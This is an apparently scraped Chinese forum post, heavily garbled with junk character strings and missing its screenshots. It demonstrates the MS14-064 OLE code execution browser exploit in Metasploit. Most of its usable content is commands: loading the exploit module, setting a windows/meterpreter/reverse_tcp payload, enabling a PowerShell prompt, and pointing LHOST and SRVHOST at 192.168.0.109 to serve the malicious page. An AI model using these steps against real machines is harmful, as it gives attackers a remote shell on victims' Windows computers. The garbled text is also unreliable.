+ m, w% P; [! t* P6 Y( x. B7 }' {/ d8 C
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示; L6 P1 ^. l2 i1 e
4 u) B6 `! ]* T* e* ^* e# Z
$ U" W% G: k$ r! i5 H 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
6 p/ G4 J- [( p$ ~+ r
* h* {7 V1 o7 ]& w$ G( @2 N! A2 s: P% M* b T
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp: L' t) q1 Y3 J. W6 o. X; k) x
2 a' O* X6 K1 h3 r# y
/ e& B) V7 x \' ^' a% Y7 ]; u set AllowPowershellPrompt true
) ^/ B1 N2 C* u: w {9 |
3 v8 j7 M$ ]( z U
7 O7 a: c9 s7 I) ^ O/ i Set LHOST 192.168.0.109
, P: c: j0 k$ ?8 ~: y& F) f7 S$ p
0 q, B' v# j- X2 o) [* H: i/ t# d* Q
' U; \- q& r- X k; W/ F set SRVHOST 192.168.0.109
: j" E7 q: D8 u4 v# j; ]
0 P' S* g- S; s1 ]1 G" V
: R5 e' n6 A/ [+ _0 ` Set uripath share
- C4 X% D6 ~- [% _0 f
( N/ q3 K6 y$ p$ x. W) G# j6 Z0 J* g( @( n
Set srvport 804 l* V( k: G4 U, G# b, q
- }4 O' Y( d, z/ W# u2 L0 M. b/ L- w3 L
; N: L" I9 R( a- Q. `
: ]/ ^; x x# B! c% Z( s
6 \! `& P, z! z# @" ~2 y
& p! |+ B( S0 ]: p9 k( N 2 u7 q1 k y* V2 b" V" T; m8 A
8 W6 u6 U" \% q4 e3 D6 ?3 _( A
* t l1 m8 c" e v ' ?2 X- N& D3 D$ ^7 D* ~
8 h7 L) k( L# X& r! Y# r4 o' J% R1 J5 B
, n& L. l; W- X0 v) Q& f% t
* y- m$ w1 a0 T# Z) G" Z7 O; }
( O! Z( A' M( l+ g! `$ B/ x( ? ' D/ v9 q: ]4 D0 ]' d! z9 g' A
7 x J% [+ S, \0 b4 D; h9 n& B9 s4 A0 z3 Z# d) }( T6 D
下面我们来访问本地地址如图:, [: u" n0 t1 q0 h6 K
! F5 Q8 b, f3 e4 M# {
1 u! I8 P) e+ \) f 9 W/ ^7 c. k+ s2 u8 k/ V# P
" ]1 D$ H* T8 \
: A x. [0 _' O
2 s6 I% Q; y% E
+ ^5 w0 h! ?( q7 k7 A0 N
z) y1 H- Y4 O) x. T
3 }+ v( U& O( U, Q